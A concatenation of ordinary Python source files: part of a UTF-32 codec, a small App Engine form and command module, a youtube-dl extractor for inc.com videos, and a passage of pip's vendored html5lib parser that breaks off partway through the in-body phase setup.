def _buffer_decode(self, input, errors, final):
if self.decoder is None:
(output, consumed, byteorder) = \
codecs.utf_32_ex_decode(input, errors, 0, final)
if byteorder == -1:
self.decoder = codecs.utf_32_le_decode
elif byteorder == 1:
self.decoder = codecs.utf_32_be_decode
elif consumed >= 4:
raise UnicodeError("UTF-32 stream does not start with BOM")
return (output, consumed)
return self.decoder(input, self.errors, final)
def reset(self):
codecs.BufferedIncrementalDecoder.reset(self)
self.decoder = None
def getstate(self):
# additional state info from the base class must be None here,
# as it isn't passed along to the caller
state = codecs.BufferedIncrementalDecoder.getstate(self)[0]
# additional state info we pass to the caller:
# 0: stream is in natural order for this platform
# 1: stream is in unnatural order
# 2: endianness hasn't been determined yet
if self.decoder is None:
return (state, 2)
addstate = int((sys.byteorder == "big") !=
(self.decoder is codecs.utf_32_be_decode))
return (state, addstate)
def setstate(self, state):
# state[1] will be ignored by BufferedIncrementalDecoder.setstate()
codecs.BufferedIncrementalDecoder.setstate(self, state)
state = state[1]
if state == 0:
self.decoder = (codecs.utf_32_be_decode
if sys.byteorder == "big"
else codecs.utf_32_le_decode)
elif state == 1:
self.decoder = (codecs.utf_32_le_decode
if sys.byteorder == "big"
else codecs.utf_32_be_decode)
else:
self.decoder = None
class StreamWriter(codecs.StreamWriter):
def __init__(self, stream, errors='strict'):
self.encoder = None
codecs.StreamWriter.__init__(self, stream, errors)
def reset(self):
codecs.StreamWriter.reset(self)
self.encoder = None
def encode(self, input, errors='strict'):
if self.encoder is None:
result = codecs.utf_32_encode(input, errors)
if sys.byteorder == 'little':
self.encoder = codecs.utf_32_le_encode
else:
self.encoder = codecs.utf_32_be_encode
return result
else:
return self.encoder(input, errors)
class StreamReader(codecs.StreamReader):
def reset(self):
codecs.StreamReader.reset(self)
try:
del self.decode
except AttributeError:
pass
def decode(self, input, errors='strict'):
(object, consumed, byteorder) = \
codecs.utf_32_ex_decode(input, errors, 0, False)
if byteorder == -1:
self.decode = codecs.utf_32_le_decode
elif byteorder == 1:
self.decode = codecs.utf_32_be_decode
elif consumed>=4:
raise UnicodeError,"UTF-32 stream does not start with BOM"
return (object, consumed)
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='utf-32',
encode=encode,
decode=decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
|
ghclara/ProgScripts | refs/heads/master | tekton-master/backend/apps/lingAngular_app/commands.py | 1 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from gaebusiness.gaeutil import SaveCommand, ModelSearchCommand
from gaeforms.ndb.form import ModelForm
from gaegraph.business_base import UpdateNode
from lingAngular_app.model import LingAngular
class LingAngularPublicForm(ModelForm):
"""
Form used to show properties on app's home
"""
_model_class = LingAngular
_include = [LingAngular.descricao]
class LingAngularForm(ModelForm):
"""
Form used to save and update operations on app's admin page
"""
_model_class = LingAngular
_include = [LingAngular.descricao]
class LingAngularDetailForm(ModelForm):
"""
Form used to show entity details on app's admin page
"""
_model_class = LingAngular
_include = [LingAngular.creation,
LingAngular.descricao]
class LingAngularShortForm(ModelForm):
"""
Form used to show entity short version on app's admin page, mainly for tables
"""
_model_class = LingAngular
_include = [LingAngular.creation,
LingAngular.descricao]
class SaveLingAngularCommand(SaveCommand):
_model_form_class = LingAngularForm
class UpdateLingAngularCommand(UpdateNode):
_model_form_class = LingAngularForm
class ListLingAngularCommand(ModelSearchCommand):
def __init__(self):
super(ListLingAngularCommand, self).__init__(LingAngular.query_by_creation())
|
vjmac15/Lyilis | refs/heads/master | lib/youtube_dl/extractor/inc (VJ Washington's conflicted copy 2017-08-29).py | 40 | from __future__ import unicode_literals
from .common import InfoExtractor
from .kaltura import KalturaIE
class IncIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?inc\.com/(?:[^/]+/)+(?P<id>[^.]+).html'
_TESTS = [{
'url': 'http://www.inc.com/tip-sheet/bill-gates-says-these-5-books-will-make-you-smarter.html',
'md5': '7416739c9c16438c09fa35619d6ba5cb',
'info_dict': {
'id': '1_wqig47aq',
'ext': 'mov',
'title': 'Bill Gates Says These 5 Books Will Make You Smarter',
'description': 'md5:bea7ff6cce100886fc1995acb743237e',
'timestamp': 1474414430,
'upload_date': '20160920',
'uploader_id': '[email protected]',
},
'params': {
'skip_download': True,
},
}, {
'url': 'http://www.inc.com/video/david-whitford/founders-forum-tripadvisor-steve-kaufer-most-enjoyable-moment-for-entrepreneur.html',
'only_matching': True,
}]
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
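# Both ids live in inline JavaScript on the page: the Kaltura partner id in a
# bizo variable, the entry id in pageInfo.videos.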
partner_id = self._search_regex(
r'var\s+_?bizo_data_partner_id\s*=\s*["\'](\d+)', webpage, 'partner id')
kaltura_id = self._parse_json(self._search_regex(
r'pageInfo\.videos\s*=\s*\[(.+)\];', webpage, 'kaltura id'),
display_id)['vid_kaltura_id']
return self.url_result(
'kaltura:%s:%s' % (partner_id, kaltura_id), KalturaIE.ie_key())
|
gemmaan/moviesenal | refs/heads/master | Hasil/Lib/site-packages/pip/_vendor/html5lib/html5parser.py | 327 | from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import with_metaclass, viewkeys, PY3
import types
try:
from collections import OrderedDict
except ImportError:
from pip._vendor.ordereddict import OrderedDict
from . import _inputstream
from . import _tokenizer
from . import treebuilders
from .treebuilders.base import Marker
from . import _utils
from .constants import (
spaceCharacters, asciiUpper2Lower,
specialElements, headingElements, cdataElements, rcdataElements,
tokenTypes, tagTokenTypes,
namespaces,
htmlIntegrationPointElements, mathmlTextIntegrationPointElements,
adjustForeignAttributes as adjustForeignAttributesMap,
adjustMathMLAttributes, adjustSVGAttributes,
E,
ReparseException
)
def parse(doc, treebuilder="etree", namespaceHTMLElements=True, **kwargs):
"""Parse a string or file-like object into a tree"""
tb = treebuilders.getTreeBuilder(treebuilder)
p = HTMLParser(tb, namespaceHTMLElements=namespaceHTMLElements)
return p.parse(doc, **kwargs)
def parseFragment(doc, container="div", treebuilder="etree", namespaceHTMLElements=True, **kwargs):
tb = treebuilders.getTreeBuilder(treebuilder)
p = HTMLParser(tb, namespaceHTMLElements=namespaceHTMLElements)
return p.parseFragment(doc, container=container, **kwargs)
def method_decorator_metaclass(function):
class Decorated(type):
def __new__(meta, classname, bases, classDict):
for attributeName, attribute in classDict.items():
if isinstance(attribute, types.FunctionType):
attribute = function(attribute)
classDict[attributeName] = attribute
return type.__new__(meta, classname, bases, classDict)
return Decorated
class HTMLParser(object):
"""HTML parser. Generates a tree structure from a stream of (possibly
malformed) HTML"""
def __init__(self, tree=None, strict=False, namespaceHTMLElements=True, debug=False):
"""
strict - raise an exception when a parse error is encountered
tree - a treebuilder class controlling the type of tree that will be
returned. Built in treebuilders can be accessed through
html5lib.treebuilders.getTreeBuilder(treeType)
"""
# Raise an exception on the first error encountered
self.strict = strict
if tree is None:
tree = treebuilders.getTreeBuilder("etree")
self.tree = tree(namespaceHTMLElements)
self.errors = []
self.phases = dict([(name, cls(self, self.tree)) for name, cls in
getPhases(debug).items()])
def _parse(self, stream, innerHTML=False, container="div", scripting=False, **kwargs):
self.innerHTMLMode = innerHTML
self.container = container
self.scripting = scripting
self.tokenizer = _tokenizer.HTMLTokenizer(stream, parser=self, **kwargs)
self.reset()
try:
self.mainLoop()
except ReparseException:
self.reset()
self.mainLoop()
def reset(self):
self.tree.reset()
self.firstStartTag = False
self.errors = []
self.log = [] # only used with debug mode
# "quirks" / "limited quirks" / "no quirks"
self.compatMode = "no quirks"
if self.innerHTMLMode:
self.innerHTML = self.container.lower()
if self.innerHTML in cdataElements:
self.tokenizer.state = self.tokenizer.rcdataState
elif self.innerHTML in rcdataElements:
self.tokenizer.state = self.tokenizer.rawtextState
elif self.innerHTML == 'plaintext':
self.tokenizer.state = self.tokenizer.plaintextState
else:
# state already is data state
# self.tokenizer.state = self.tokenizer.dataState
pass
self.phase = self.phases["beforeHtml"]
self.phase.insertHtmlElement()
self.resetInsertionMode()
else:
self.innerHTML = False # pylint:disable=redefined-variable-type
self.phase = self.phases["initial"]
self.lastPhase = None
self.beforeRCDataPhase = None
self.framesetOK = True
@property
def documentEncoding(self):
"""The name of the character encoding
that was used to decode the input stream,
or :obj:`None` if that is not determined yet.
"""
if not hasattr(self, 'tokenizer'):
return None
return self.tokenizer.stream.charEncoding[0].name
def isHTMLIntegrationPoint(self, element):
if (element.name == "annotation-xml" and
element.namespace == namespaces["mathml"]):
return ("encoding" in element.attributes and
element.attributes["encoding"].translate(
asciiUpper2Lower) in
("text/html", "application/xhtml+xml"))
else:
return (element.namespace, element.name) in htmlIntegrationPointElements
def isMathMLTextIntegrationPoint(self, element):
return (element.namespace, element.name) in mathmlTextIntegrationPointElements
def mainLoop(self):
CharactersToken = tokenTypes["Characters"]
SpaceCharactersToken = tokenTypes["SpaceCharacters"]
StartTagToken = tokenTypes["StartTag"]
EndTagToken = tokenTypes["EndTag"]
CommentToken = tokenTypes["Comment"]
DoctypeToken = tokenTypes["Doctype"]
ParseErrorToken = tokenTypes["ParseError"]
for token in self.normalizedTokens():
prev_token = None
new_token = token
while new_token is not None:
prev_token = new_token
currentNode = self.tree.openElements[-1] if self.tree.openElements else None
currentNodeNamespace = currentNode.namespace if currentNode else None
currentNodeName = currentNode.name if currentNode else None
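# Tree-construction dispatcher: route the token to the current phase unless
# the current node is in foreign (MathML/SVG) content, in which case the
# inForeignContent phase handles it.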
type = new_token["type"]
if type == ParseErrorToken:
self.parseError(new_token["data"], new_token.get("datavars", {}))
new_token = None
else:
if (len(self.tree.openElements) == 0 or
currentNodeNamespace == self.tree.defaultNamespace or
(self.isMathMLTextIntegrationPoint(currentNode) and
((type == StartTagToken and
token["name"] not in frozenset(["mglyph", "malignmark"])) or
type in (CharactersToken, SpaceCharactersToken))) or
(currentNodeNamespace == namespaces["mathml"] and
currentNodeName == "annotation-xml" and
type == StartTagToken and
token["name"] == "svg") or
(self.isHTMLIntegrationPoint(currentNode) and
type in (StartTagToken, CharactersToken, SpaceCharactersToken))):
phase = self.phase
else:
phase = self.phases["inForeignContent"]
if type == CharactersToken:
new_token = phase.processCharacters(new_token)
elif type == SpaceCharactersToken:
new_token = phase.processSpaceCharacters(new_token)
elif type == StartTagToken:
new_token = phase.processStartTag(new_token)
elif type == EndTagToken:
new_token = phase.processEndTag(new_token)
elif type == CommentToken:
new_token = phase.processComment(new_token)
elif type == DoctypeToken:
new_token = phase.processDoctype(new_token)
if (type == StartTagToken and prev_token["selfClosing"] and
not prev_token["selfClosingAcknowledged"]):
self.parseError("non-void-element-with-trailing-solidus",
{"name": prev_token["name"]})
# When the loop finishes it's EOF
reprocess = True
phases = []
while reprocess:
phases.append(self.phase)
reprocess = self.phase.processEOF()
if reprocess:
assert self.phase not in phases
def normalizedTokens(self):
for token in self.tokenizer:
yield self.normalizeToken(token)
def parse(self, stream, *args, **kwargs):
"""Parse a HTML document into a well-formed tree
stream - a filelike object or string containing the HTML to be parsed
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
scripting - treat noscript elements as if javascript was turned on
"""
self._parse(stream, False, None, *args, **kwargs)
return self.tree.getDocument()
def parseFragment(self, stream, *args, **kwargs):
"""Parse a HTML fragment into a well-formed tree fragment
container - name of the element we're setting the innerHTML property
if set to None, default to 'div'
stream - a filelike object or string containing the HTML to be parsed
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
scripting - treat noscript elements as if javascript was turned on
"""
self._parse(stream, True, *args, **kwargs)
return self.tree.getFragment()
def parseError(self, errorcode="XXX-undefined-error", datavars=None):
# XXX The idea is to make errorcode mandatory.
if datavars is None:
datavars = {}
self.errors.append((self.tokenizer.stream.position(), errorcode, datavars))
if self.strict:
raise ParseError(E[errorcode] % datavars)
def normalizeToken(self, token):
""" HTML5 specific normalizations to the token stream """
if token["type"] == tokenTypes["StartTag"]:
raw = token["data"]
token["data"] = OrderedDict(raw)
if len(raw) > len(token["data"]):
# we had some duplicated attribute, fix so first wins
token["data"].update(raw[::-1])
return token
def adjustMathMLAttributes(self, token):
adjust_attributes(token, adjustMathMLAttributes)
def adjustSVGAttributes(self, token):
adjust_attributes(token, adjustSVGAttributes)
def adjustForeignAttributes(self, token):
adjust_attributes(token, adjustForeignAttributesMap)
def reparseTokenNormal(self, token):
# pylint:disable=unused-argument
self.parser.phase()
def resetInsertionMode(self):
# The name of this method is mostly historical. (It's also used in the
# specification.)
last = False
newModes = {
"select": "inSelect",
"td": "inCell",
"th": "inCell",
"tr": "inRow",
"tbody": "inTableBody",
"thead": "inTableBody",
"tfoot": "inTableBody",
"caption": "inCaption",
"colgroup": "inColumnGroup",
"table": "inTable",
"head": "inBody",
"body": "inBody",
"frameset": "inFrameset",
"html": "beforeHead"
}
for node in self.tree.openElements[::-1]:
nodeName = node.name
new_phase = None
if node == self.tree.openElements[0]:
assert self.innerHTML
last = True
nodeName = self.innerHTML
# Check for conditions that should only happen in the innerHTML
# case
if nodeName in ("select", "colgroup", "head", "html"):
assert self.innerHTML
if not last and node.namespace != self.tree.defaultNamespace:
continue
if nodeName in newModes:
new_phase = self.phases[newModes[nodeName]]
break
elif last:
new_phase = self.phases["inBody"]
break
self.phase = new_phase
def parseRCDataRawtext(self, token, contentType):
"""Generic RCDATA/RAWTEXT Parsing algorithm
contentType - RCDATA or RAWTEXT
"""
assert contentType in ("RAWTEXT", "RCDATA")
self.tree.insertElement(token)
if contentType == "RAWTEXT":
self.tokenizer.state = self.tokenizer.rawtextState
else:
self.tokenizer.state = self.tokenizer.rcdataState
self.originalPhase = self.phase
self.phase = self.phases["text"]
@_utils.memoize
def getPhases(debug):
def log(function):
"""Logger that records which phase processes each token"""
type_names = dict((value, key) for key, value in
tokenTypes.items())
def wrapped(self, *args, **kwargs):
if function.__name__.startswith("process") and len(args) > 0:
token = args[0]
try:
info = {"type": type_names[token['type']]}
except:
raise
if token['type'] in tagTokenTypes:
info["name"] = token['name']
self.parser.log.append((self.parser.tokenizer.state.__name__,
self.parser.phase.__class__.__name__,
self.__class__.__name__,
function.__name__,
info))
return function(self, *args, **kwargs)
else:
return function(self, *args, **kwargs)
return wrapped
def getMetaclass(use_metaclass, metaclass_func):
if use_metaclass:
return method_decorator_metaclass(metaclass_func)
else:
return type
# pylint:disable=unused-argument
class Phase(with_metaclass(getMetaclass(debug, log))):
"""Base class for helper object that implements each phase of processing
"""
def __init__(self, parser, tree):
self.parser = parser
self.tree = tree
def processEOF(self):
raise NotImplementedError
def processComment(self, token):
# For most phases the following is correct. Where it's not it will be
# overridden.
self.tree.insertComment(token, self.tree.openElements[-1])
def processDoctype(self, token):
self.parser.parseError("unexpected-doctype")
def processCharacters(self, token):
self.tree.insertText(token["data"])
def processSpaceCharacters(self, token):
self.tree.insertText(token["data"])
def processStartTag(self, token):
return self.startTagHandler[token["name"]](token)
def startTagHtml(self, token):
if not self.parser.firstStartTag and token["name"] == "html":
self.parser.parseError("non-html-root")
# XXX Need a check here to see if the first start tag token emitted is
# this token... If it's not, invoke self.parser.parseError().
for attr, value in token["data"].items():
if attr not in self.tree.openElements[0].attributes:
self.tree.openElements[0].attributes[attr] = value
self.parser.firstStartTag = False
def processEndTag(self, token):
return self.endTagHandler[token["name"]](token)
class InitialPhase(Phase):
def processSpaceCharacters(self, token):
pass
def processComment(self, token):
self.tree.insertComment(token, self.tree.document)
def processDoctype(self, token):
name = token["name"]
publicId = token["publicId"]
systemId = token["systemId"]
correct = token["correct"]
if (name != "html" or publicId is not None or
systemId is not None and systemId != "about:legacy-compat"):
self.parser.parseError("unknown-doctype")
if publicId is None:
publicId = ""
self.tree.insertDoctype(token)
if publicId != "":
publicId = publicId.translate(asciiUpper2Lower)
if (not correct or token["name"] != "html" or
publicId.startswith(
("+//silmaril//dtd html pro v0r11 19970101//",
"-//advasoft ltd//dtd html 3.0 aswedit + extensions//",
"-//as//dtd html 3.0 aswedit + extensions//",
"-//ietf//dtd html 2.0 level 1//",
"-//ietf//dtd html 2.0 level 2//",
"-//ietf//dtd html 2.0 strict level 1//",
"-//ietf//dtd html 2.0 strict level 2//",
"-//ietf//dtd html 2.0 strict//",
"-//ietf//dtd html 2.0//",
"-//ietf//dtd html 2.1e//",
"-//ietf//dtd html 3.0//",
"-//ietf//dtd html 3.2 final//",
"-//ietf//dtd html 3.2//",
"-//ietf//dtd html 3//",
"-//ietf//dtd html level 0//",
"-//ietf//dtd html level 1//",
"-//ietf//dtd html level 2//",
"-//ietf//dtd html level 3//",
"-//ietf//dtd html strict level 0//",
"-//ietf//dtd html strict level 1//",
"-//ietf//dtd html strict level 2//",
"-//ietf//dtd html strict level 3//",
"-//ietf//dtd html strict//",
"-//ietf//dtd html//",
"-//metrius//dtd metrius presentational//",
"-//microsoft//dtd internet explorer 2.0 html strict//",
"-//microsoft//dtd internet explorer 2.0 html//",
"-//microsoft//dtd internet explorer 2.0 tables//",
"-//microsoft//dtd internet explorer 3.0 html strict//",
"-//microsoft//dtd internet explorer 3.0 html//",
"-//microsoft//dtd internet explorer 3.0 tables//",
"-//netscape comm. corp.//dtd html//",
"-//netscape comm. corp.//dtd strict html//",
"-//o'reilly and associates//dtd html 2.0//",
"-//o'reilly and associates//dtd html extended 1.0//",
"-//o'reilly and associates//dtd html extended relaxed 1.0//",
"-//softquad software//dtd hotmetal pro 6.0::19990601::extensions to html 4.0//",
"-//softquad//dtd hotmetal pro 4.0::19971010::extensions to html 4.0//",
"-//spyglass//dtd html 2.0 extended//",
"-//sq//dtd html 2.0 hotmetal + extensions//",
"-//sun microsystems corp.//dtd hotjava html//",
"-//sun microsystems corp.//dtd hotjava strict html//",
"-//w3c//dtd html 3 1995-03-24//",
"-//w3c//dtd html 3.2 draft//",
"-//w3c//dtd html 3.2 final//",
"-//w3c//dtd html 3.2//",
"-//w3c//dtd html 3.2s draft//",
"-//w3c//dtd html 4.0 frameset//",
"-//w3c//dtd html 4.0 transitional//",
"-//w3c//dtd html experimental 19960712//",
"-//w3c//dtd html experimental 970421//",
"-//w3c//dtd w3 html//",
"-//w3o//dtd w3 html 3.0//",
"-//webtechs//dtd mozilla html 2.0//",
"-//webtechs//dtd mozilla html//")) or
publicId in ("-//w3o//dtd w3 html strict 3.0//en//",
"-/w3c/dtd html 4.0 transitional/en",
"html") or
publicId.startswith(
("-//w3c//dtd html 4.01 frameset//",
"-//w3c//dtd html 4.01 transitional//")) and
systemId is None or
systemId and systemId.lower() == "http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd"):
self.parser.compatMode = "quirks"
elif (publicId.startswith(
("-//w3c//dtd xhtml 1.0 frameset//",
"-//w3c//dtd xhtml 1.0 transitional//")) or
publicId.startswith(
("-//w3c//dtd html 4.01 frameset//",
"-//w3c//dtd html 4.01 transitional//")) and
systemId is not None):
self.parser.compatMode = "limited quirks"
self.parser.phase = self.parser.phases["beforeHtml"]
def anythingElse(self):
self.parser.compatMode = "quirks"
self.parser.phase = self.parser.phases["beforeHtml"]
def processCharacters(self, token):
self.parser.parseError("expected-doctype-but-got-chars")
self.anythingElse()
return token
def processStartTag(self, token):
self.parser.parseError("expected-doctype-but-got-start-tag",
{"name": token["name"]})
self.anythingElse()
return token
def processEndTag(self, token):
self.parser.parseError("expected-doctype-but-got-end-tag",
{"name": token["name"]})
self.anythingElse()
return token
def processEOF(self):
self.parser.parseError("expected-doctype-but-got-eof")
self.anythingElse()
return True
class BeforeHtmlPhase(Phase):
# helper methods
def insertHtmlElement(self):
self.tree.insertRoot(impliedTagToken("html", "StartTag"))
self.parser.phase = self.parser.phases["beforeHead"]
# other
def processEOF(self):
self.insertHtmlElement()
return True
def processComment(self, token):
self.tree.insertComment(token, self.tree.document)
def processSpaceCharacters(self, token):
pass
def processCharacters(self, token):
self.insertHtmlElement()
return token
def processStartTag(self, token):
if token["name"] == "html":
self.parser.firstStartTag = True
self.insertHtmlElement()
return token
def processEndTag(self, token):
if token["name"] not in ("head", "body", "html", "br"):
self.parser.parseError("unexpected-end-tag-before-html",
{"name": token["name"]})
else:
self.insertHtmlElement()
return token
class BeforeHeadPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("head", self.startTagHead)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
(("head", "body", "html", "br"), self.endTagImplyHead)
])
self.endTagHandler.default = self.endTagOther
def processEOF(self):
self.startTagHead(impliedTagToken("head", "StartTag"))
return True
def processSpaceCharacters(self, token):
pass
def processCharacters(self, token):
self.startTagHead(impliedTagToken("head", "StartTag"))
return token
def startTagHtml(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagHead(self, token):
self.tree.insertElement(token)
self.tree.headPointer = self.tree.openElements[-1]
self.parser.phase = self.parser.phases["inHead"]
def startTagOther(self, token):
self.startTagHead(impliedTagToken("head", "StartTag"))
return token
def endTagImplyHead(self, token):
self.startTagHead(impliedTagToken("head", "StartTag"))
return token
def endTagOther(self, token):
self.parser.parseError("end-tag-after-implied-root",
{"name": token["name"]})
class InHeadPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("title", self.startTagTitle),
(("noframes", "style"), self.startTagNoFramesStyle),
("noscript", self.startTagNoscript),
("script", self.startTagScript),
(("base", "basefont", "bgsound", "command", "link"),
self.startTagBaseLinkCommand),
("meta", self.startTagMeta),
("head", self.startTagHead)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("head", self.endTagHead),
(("br", "html", "body"), self.endTagHtmlBodyBr)
])
self.endTagHandler.default = self.endTagOther
# the real thing
def processEOF(self):
self.anythingElse()
return True
def processCharacters(self, token):
self.anythingElse()
return token
def startTagHtml(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagHead(self, token):
self.parser.parseError("two-heads-are-not-better-than-one")
def startTagBaseLinkCommand(self, token):
self.tree.insertElement(token)
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
def startTagMeta(self, token):
self.tree.insertElement(token)
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
attributes = token["data"]
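            # Only re-examine the encoding while it is still "tentative",
            # i.e. sniffed rather than fixed by the transport layer or a BOM.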
if self.parser.tokenizer.stream.charEncoding[1] == "tentative":
if "charset" in attributes:
self.parser.tokenizer.stream.changeEncoding(attributes["charset"])
elif ("content" in attributes and
"http-equiv" in attributes and
attributes["http-equiv"].lower() == "content-type"):
                    # Encoding it as UTF-8 here is a hack, as really we should
                    # pass the abstract Unicode string and just use the
                    # ContentAttrParser on that, but using UTF-8 allows all
                    # chars to be encoded and, as an ASCII superset, it works.
data = _inputstream.EncodingBytes(attributes["content"].encode("utf-8"))
parser = _inputstream.ContentAttrParser(data)
codec = parser.parse()
self.parser.tokenizer.stream.changeEncoding(codec)
def startTagTitle(self, token):
self.parser.parseRCDataRawtext(token, "RCDATA")
def startTagNoFramesStyle(self, token):
# Need to decide whether to implement the scripting-disabled case
self.parser.parseRCDataRawtext(token, "RAWTEXT")
def startTagNoscript(self, token):
if self.parser.scripting:
self.parser.parseRCDataRawtext(token, "RAWTEXT")
else:
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inHeadNoscript"]
def startTagScript(self, token):
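            # Switch the tokenizer into the "script data" state and buffer
            # everything up to </script> in the "text" insertion mode.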
self.tree.insertElement(token)
self.parser.tokenizer.state = self.parser.tokenizer.scriptDataState
self.parser.originalPhase = self.parser.phase
self.parser.phase = self.parser.phases["text"]
def startTagOther(self, token):
self.anythingElse()
return token
def endTagHead(self, token):
node = self.parser.tree.openElements.pop()
assert node.name == "head", "Expected head got %s" % node.name
self.parser.phase = self.parser.phases["afterHead"]
def endTagHtmlBodyBr(self, token):
self.anythingElse()
return token
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
def anythingElse(self):
self.endTagHead(impliedTagToken("head"))
class InHeadNoscriptPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
(("basefont", "bgsound", "link", "meta", "noframes", "style"), self.startTagBaseLinkCommand),
(("head", "noscript"), self.startTagHeadNoscript),
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("noscript", self.endTagNoscript),
("br", self.endTagBr),
])
self.endTagHandler.default = self.endTagOther
def processEOF(self):
self.parser.parseError("eof-in-head-noscript")
self.anythingElse()
return True
def processComment(self, token):
return self.parser.phases["inHead"].processComment(token)
def processCharacters(self, token):
self.parser.parseError("char-in-head-noscript")
self.anythingElse()
return token
def processSpaceCharacters(self, token):
return self.parser.phases["inHead"].processSpaceCharacters(token)
def startTagHtml(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagBaseLinkCommand(self, token):
return self.parser.phases["inHead"].processStartTag(token)
def startTagHeadNoscript(self, token):
self.parser.parseError("unexpected-start-tag", {"name": token["name"]})
def startTagOther(self, token):
self.parser.parseError("unexpected-inhead-noscript-tag", {"name": token["name"]})
self.anythingElse()
return token
def endTagNoscript(self, token):
node = self.parser.tree.openElements.pop()
assert node.name == "noscript", "Expected noscript got %s" % node.name
self.parser.phase = self.parser.phases["inHead"]
def endTagBr(self, token):
self.parser.parseError("unexpected-inhead-noscript-tag", {"name": token["name"]})
self.anythingElse()
return token
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
def anythingElse(self):
# Caller must raise parse error first!
self.endTagNoscript(impliedTagToken("noscript"))
class AfterHeadPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("body", self.startTagBody),
("frameset", self.startTagFrameset),
(("base", "basefont", "bgsound", "link", "meta", "noframes", "script",
"style", "title"),
self.startTagFromHead),
("head", self.startTagHead)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([(("body", "html", "br"),
self.endTagHtmlBodyBr)])
self.endTagHandler.default = self.endTagOther
def processEOF(self):
self.anythingElse()
return True
def processCharacters(self, token):
self.anythingElse()
return token
def startTagHtml(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagBody(self, token):
self.parser.framesetOK = False
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inBody"]
def startTagFrameset(self, token):
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inFrameset"]
def startTagFromHead(self, token):
self.parser.parseError("unexpected-start-tag-out-of-my-head",
{"name": token["name"]})
self.tree.openElements.append(self.tree.headPointer)
self.parser.phases["inHead"].processStartTag(token)
for node in self.tree.openElements[::-1]:
if node.name == "head":
self.tree.openElements.remove(node)
break
def startTagHead(self, token):
self.parser.parseError("unexpected-start-tag", {"name": token["name"]})
def startTagOther(self, token):
self.anythingElse()
return token
def endTagHtmlBodyBr(self, token):
self.anythingElse()
return token
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
def anythingElse(self):
self.tree.insertElement(impliedTagToken("body", "StartTag"))
self.parser.phase = self.parser.phases["inBody"]
self.parser.framesetOK = True
class InBodyPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#parsing-main-inbody
# the really-really-really-very crazy mode
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
# Set this to the default handler
self.processSpaceCharacters = self.processSpaceCharactersNonPre
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
(("base", "basefont", "bgsound", "command", "link", "meta",
"script", "style", "title"),
self.startTagProcessInHead),
("body", self.startTagBody),
("frameset", self.startTagFrameset),
(("address", "article", "aside", "blockquote", "center", "details",
"dir", "div", "dl", "fieldset", "figcaption", "figure",
"footer", "header", "hgroup", "main", "menu", "nav", "ol", "p",
"section", "summary", "ul"),
self.startTagCloseP),
(headingElements, self.startTagHeading),
(("pre", "listing"), self.startTagPreListing),
("form", self.startTagForm),
(("li", "dd", "dt"), self.startTagListItem),
("plaintext", self.startTagPlaintext),
("a", self.startTagA),
(("b", "big", "code", "em", "font", "i", "s", "small", "strike",
"strong", "tt", "u"), self.startTagFormatting),
("nobr", self.startTagNobr),
("button", self.startTagButton),
(("applet", "marquee", "object"), self.startTagAppletMarqueeObject),
("xmp", self.startTagXmp),
("table", self.startTagTable),
(("area", "br", "embed", "img", "keygen", "wbr"),
self.startTagVoidFormatting),
(("param", "source", "track"), self.startTagParamSource),
("input", self.startTagInput),
("hr", self.startTagHr),
("image", self.startTagImage),
("isindex", self.startTagIsIndex),
("textarea", self.startTagTextarea),
("iframe", self.startTagIFrame),
("noscript", self.startTagNoscript),
(("noembed", "noframes"), self.startTagRawtext),
("select", self.startTagSelect),
(("rp", "rt"), self.startTagRpRt),
(("option", "optgroup"), self.startTagOpt),
(("math"), self.startTagMath),
(("svg"), self.startTagSvg),
(("caption", "col", "colgroup", "frame", "head",
"tbody", "td", "tfoot", "th", "thead",
"tr"), self.startTagMisplaced)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("body", self.endTagBody),
("html", self.endTagHtml),
(("address", "article", "aside", "blockquote", "button", "center",
"details", "dialog", "dir", "div", "dl", "fieldset", "figcaption", "figure",
"footer", "header", "hgroup", "listing", "main", "menu", "nav", "ol", "pre",
"section", "summary", "ul"), self.endTagBlock),
("form", self.endTagForm),
("p", self.endTagP),
(("dd", "dt", "li"), self.endTagListItem),
